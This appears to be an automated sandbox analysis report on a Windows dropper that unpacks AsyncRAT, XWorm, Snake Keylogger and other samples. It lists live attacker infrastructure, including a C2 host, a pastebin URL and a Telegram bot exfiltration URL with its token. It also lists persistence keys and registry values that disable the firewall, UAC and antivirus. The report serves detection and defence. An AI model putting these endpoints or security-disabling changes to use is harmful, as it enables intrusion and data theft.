Analysis
-
max time kernel
9s -
max time network
54s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
08-10-2024 21:23
Static task
static1
Behavioral task
behavioral1
Sample
Fello_s_Revenge.exe
Resource
win7-20240704-en
General
-
Target
Fello_s_Revenge.exe
-
Size
18.4MB
-
MD5
f8e1d9b436b1d95231ae33b44c6f165c
-
SHA1
bd4a588b9bbcd346fd0e4818da382ca241104d17
-
SHA256
23a6dc4cce379f0d6a85e0b2b09e66d0d0f370e9d610a84aa1810aab605a3976
-
SHA512
963f3ca6370d36d54d9034000e33198e9cfa8d54f7c70cf67e0e9be246a30bbd2db5f927c9dbb5edfebab3e255ece6023d3a2ed72715d1842519a9d2ff45a7f6
-
SSDEEP
393216:XpkQrjxkZI7X/exB5l7qqd6DqhDzeozX5dpYeewDuBnkeKyN:Xrr1kTz7qqAGdzpdFynkeKyN
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Extracted
asyncrat
0.5.8
Default
127.0.0.1:51848
otherwise-puzzle.gl.at.ply.gg:51848
qsSOINsibBjw
-
delay
3
-
install
true
-
install_file
dwn.exe
-
install_folder
%AppData%
Extracted
xworm
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/0GcVDftp
Extracted
snakekeylogger
https://api.telegram.org/bot7148398804:AAESLKl9fVODMrpM8H4Wkq1Zbm-83PcMLro/sendMessage?chat_id=2135869667
Signatures
-
Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs 18 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Dhpemm32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Cfnoogbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Dhpemm32.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Epmfgo32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Flfpabkp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Hnjbeh32.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Cfnoogbo.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Cpiqmlfm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Gqdefddb.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Hjlioj32.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Hnjbeh32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Cpiqmlfm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Epmfgo32.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Gqdefddb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Hjlioj32.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Flfpabkp.exe -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x00050000000194ba-1823.dat family_xworm behavioral1/memory/1908-2018-0x00000000011E0000-0x00000000011F6000-memory.dmp family_xworm -
Modifies firewall policy service 3 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe -
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
resource yara_rule behavioral1/memory/1772-3304-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2060-3309-0x00000000002F0000-0x000000000036B000-memory.dmp family_snakekeylogger -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe -
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0005000000019266-1320.dat family_asyncrat -
resource yara_rule behavioral1/files/0x0005000000018712-1301.dat cryptone -
Adds policy Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run vbc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Policies = "C:\\Windows\\system32\\install\\Svchost.exe" vbc.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run vbc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Policies = "C:\\Windows\\system32\\install\\Svchost.exe" vbc.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{BL4Y35X4-2J33-41K5-SC7K-135580N8OME5} vbc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{BL4Y35X4-2J33-41K5-SC7K-135580N8OME5}\StubPath = "C:\\Windows\\system32\\install\\Svchost.exe Restart" vbc.exe -
pid Process 3720 powershell.exe 1396 powershell.exe 7104 powershell.exe 7148 powershell.exe 4676 powershell.exe 3020 powershell.exe 2040 powershell.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Morfey.lnk 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe -
Executes dropped EXE 30 IoCs
pid Process 2708 0d4c465488b6f5f760e98a15d77da181419223fdd93915e0fb90646c645b7766.exe 2808 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe 2732 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe 2636 90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe 4500 1955e7fe3c25216101d012eb0b33f527.exe 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 3264 Cfnoogbo.exe 3392 be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe 3456 bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe 3416 Morfey.EXE 3544 c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe 3664 gold.exe 1200 Explorer.EXE 3656 Cpiqmlfm.exe 3004 Dhpemm32.exe 3484 l6E.exe 1608 Epmfgo32.exe 924 MTLADYYASSOVESSELBRIEFDETAILS.exe 1908 tt.exe 3344 sloppyCatsV1.exe 3620 Wire-transaction073921.exe 556 Zahlungsbest_tigung.exe 3852 Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe 3920 OGGY.exe 3952 lol.exe 4080 is-PFFTE.tmp 624 Flfpabkp.exe 3432 Gqdefddb.exe 2232 Hjlioj32.exe 4376 Hnjbeh32.exe -
Loads dropped DLL 52 IoCs
pid Process 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 2732 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe 2732 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 2808 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 2808 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 3392 be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe 3392 be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe 2388 Fello_s_Revenge.exe 3264 Cfnoogbo.exe 3264 Cfnoogbo.exe 3656 Cpiqmlfm.exe 3656 Cpiqmlfm.exe 3004 Dhpemm32.exe 3004 Dhpemm32.exe 3256 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 3852 Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe 3852 Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe 3852 Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 2388 Fello_s_Revenge.exe 3852 Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe 1608 Epmfgo32.exe 1608 Epmfgo32.exe 4080 is-PFFTE.tmp 4080 is-PFFTE.tmp 624 Flfpabkp.exe 624 Flfpabkp.exe 3432 Gqdefddb.exe 3432 Gqdefddb.exe 2232 Hjlioj32.exe 2232 Hjlioj32.exe 3344 sloppyCatsV1.exe -
Uses the VBS compiler for execution 1 TTPs
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\Svc a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Morfey.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\"" bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\lol.exe" lol.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\HKLM = "C:\\Windows\\system32\\install\\Svchost.exe" vbc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\HKCU = "C:\\Windows\\system32\\install\\Svchost.exe" vbc.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
flow ioc 32 pastebin.com 54 discord.com 58 raw.githubusercontent.com 59 discord.com 65 raw.githubusercontent.com 34 pastebin.com 60 raw.githubusercontent.com 74 bitbucket.org 75 bitbucket.org 76 bitbucket.org -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 checkip.dyndns.org -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 lol.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/memory/3920-2786-0x0000000000400000-0x00000000004CA000-memory.dmp autoit_exe -
Drops file in System32 directory 30 IoCs
description ioc Process File created C:\Windows\SysWOW64\Fgpomb32.dll Cpiqmlfm.exe File created C:\Windows\SysWOW64\Epmfgo32.exe Dhpemm32.exe File created C:\Windows\SysWOW64\Ijppackl.dll Cfnoogbo.exe File opened for modification C:\Windows\SysWOW64\Epmfgo32.exe Dhpemm32.exe File opened for modification C:\Windows\SysWOW64\Flfpabkp.exe Epmfgo32.exe File opened for modification C:\Windows\SysWOW64\Gqdefddb.exe Flfpabkp.exe File created C:\Windows\SysWOW64\Pbihfb32.dll Hjlioj32.exe File opened for modification C:\Windows\SysWOW64\Hmdhad32.exe Hnjbeh32.exe File created C:\Windows\SysWOW64\install\Svchost.exe vbc.exe File created C:\Windows\SysWOW64\Kkfmcc32.dll Flfpabkp.exe File created C:\Windows\SysWOW64\Akgddhmc.dll Gqdefddb.exe File opened for modification C:\Windows\SysWOW64\Dhpemm32.exe Cpiqmlfm.exe File created C:\Windows\SysWOW64\Cfnoogbo.exe 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe File created C:\Windows\SysWOW64\Dhpemm32.exe Cpiqmlfm.exe File created C:\Windows\SysWOW64\Bpjmnknl.dll Epmfgo32.exe File opened for modification C:\Windows\SysWOW64\install\Svchost.exe vbc.exe File opened for modification C:\Windows\SysWOW64\Hjlioj32.exe Gqdefddb.exe File opened for modification C:\Windows\SysWOW64\Cfnoogbo.exe 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe File created C:\Windows\SysWOW64\Cpiqmlfm.exe Cfnoogbo.exe File created C:\Windows\SysWOW64\Gojijh32.dll Dhpemm32.exe File created C:\Windows\SysWOW64\Flfpabkp.exe Epmfgo32.exe File created C:\Windows\SysWOW64\Hjlioj32.exe Gqdefddb.exe File created C:\Windows\SysWOW64\Hmdhad32.exe Hnjbeh32.exe File created C:\Windows\SysWOW64\Jlamphei.dll 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe File opened for modification C:\Windows\SysWOW64\Cpiqmlfm.exe Cfnoogbo.exe File opened for modification C:\Windows\SysWOW64\Anraabelsens\Hyposternal.udk 90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe File created C:\Windows\SysWOW64\Gqdefddb.exe Flfpabkp.exe File created C:\Windows\SysWOW64\Hnjbeh32.exe Hjlioj32.exe File opened for modification C:\Windows\SysWOW64\Hnjbeh32.exe Hjlioj32.exe File created C:\Windows\SysWOW64\Iplfej32.dll Hnjbeh32.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3456 set thread context of 328 3456 bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe 48 -
resource yara_rule behavioral1/memory/3920-2786-0x0000000000400000-0x00000000004CA000-memory.dmp upx behavioral1/memory/3920-2057-0x0000000000400000-0x00000000004CA000-memory.dmp upx behavioral1/files/0x000500000001a517-3678.dat upx behavioral1/files/0x000500000001a50b-3674.dat upx behavioral1/files/0x0013000000003d6d-5416.dat upx -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SYSTEM.INI a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 3296 msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gold.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1955e7fe3c25216101d012eb0b33f527.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fello_s_Revenge.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Dhpemm32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Epmfgo32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language l6E.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Zahlungsbest_tigung.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sloppyCatsV1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Flfpabkp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gqdefddb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MTLADYYASSOVESSELBRIEFDETAILS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language is-PFFTE.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cfnoogbo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OGGY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hjlioj32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hnjbeh32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cpiqmlfm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 624 cmd.exe 4616 PING.EXE -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x000800000001211b-1307.dat nsis_installer_1 behavioral1/files/0x000800000001211b-1307.dat nsis_installer_2 -
Delays execution with timeout.exe 1 IoCs
pid Process 2660 timeout.exe -
Modifies registry class 30 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Fgpomb32.dll" Cpiqmlfm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Cpiqmlfm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Hjlioj32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Jlamphei.dll" 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Cfnoogbo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Flfpabkp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Hjlioj32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Hnjbeh32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Cpiqmlfm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Dhpemm32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Epmfgo32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Gojijh32.dll" Dhpemm32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Flfpabkp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Akgddhmc.dll" Gqdefddb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Gqdefddb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Gqdefddb.exe Key created 